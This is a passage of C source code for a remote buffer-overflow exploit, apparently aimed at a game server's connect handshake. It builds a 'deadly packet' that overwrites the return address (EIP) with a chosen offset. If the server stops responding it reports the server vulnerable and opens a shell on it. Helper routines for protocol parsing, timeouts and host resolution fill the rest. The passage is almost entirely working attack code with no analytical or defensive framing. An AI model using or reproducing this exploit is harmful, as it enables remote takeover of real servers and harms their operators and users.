    strncpy(challenge, stri, sizeof(challenge));
    challenge[sizeof(challenge) - 1] = 0x00;
    printf("Challenge: %s\n", challenge);

    /* build the connect packet: protocol, challenge, four random "raw" words, then the EIP bytes three times */
    bufflen = snprintf(buffsend,
            sizeof(BOF1) + 64,
            bofstr,
            proto,
            challenge,
            (long)(rand() << 1) + (rand() & 0xf),    /* 31bit */
            (long)(rand() << 1) + (rand() & 0xf),
            (long)(rand() << 1) + (rand() & 0xf),
            (long)(rand() << 1) + (rand() & 0xf),
            (int)(offset & 0xFF), (int)((offset >> 8) & 0xFF), (int)((offset >> 16) & 0xFF), (int)((offset >> 24) & 0xFF),
            (int)(offset & 0xFF), (int)((offset >> 8) & 0xFF), (int)((offset >> 16) & 0xFF), (int)((offset >> 24) & 0xFF),
            (int)(offset & 0xFF), (int)((offset >> 8) & 0xFF), (int)((offset >> 16) & 0xFF), (int)((offset >> 24) & 0xFF));
    if(bufflen < 0) {
        fputs("\nError: cannot allocate buffer in memory\n", stdout);
        exit(1);
    }

    printf("Sending deadly packet ... stand by\n");
    err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    err = timeout2(sd);
    if(err < 0) {
        fputs("\nResult: The remote server IS vulnerable!!!\n", stdout);
        exec_sh(connect_sh(argv[1]));
        return(0);
    }
    err = recvfrom(sd, buffrecv, BUFFSZ - 1, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    buffrecv[err] = 0x00;
    printf("Connect: %s\n", buffrecv + 5);
    close(sd);
    fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout);
    return(0);
}

int getproto(char *buff) {
    int   p;
    char *ptr;

    ptr = strstr(buff + 23, "protocol");
    if(ptr) {
        p = atoi(ptr + 9);
    } else {
        fputs("\nError: No protocol informations in the answer of the server\n", stdout);
        exit(1);
    }
    return(p);
}

void showinfostring(char *buff, int size) {
    int   nt = 1, len;
    char *string;

    fputs("\n--------------------------------------------------\n", stdout);
    if(memcmp(buff + 1, "\xff\xff\xff", 3)) {
        fputs("\nError: Bad answer from the server (it is not a true server)\n", stdout);
        exit(1);
    }
    len = strlen(buff);
    if(len < size) buff += len + 1;
    while(1) {
        string = strchr(buff, '\\');
        if(!string) break;
        *string = 0x00;
        /* the infostring alternates \key\value; print keys with ": " and values with a newline */
        if(!nt) {
            printf("%s: ", buff);
            nt++;
        } else {
            printf("%s\n", buff);
            nt = 0;
        }
        buff = string + 1;
    }
    printf("%s\n", buff);
}

int timeout2(int sock) {
    struct timeval timeout;
    fd_set fd_read;
    int    err;

    timeout.tv_sec  = TIMEOUT;
    timeout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &timeout);
    if(err < 0) std_err();
    if(err == 0) return(-1);
    return(0);
}

u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }
    return(host_ip);
}

void std_err(void) {
    perror("\nError");
    exit(1);
}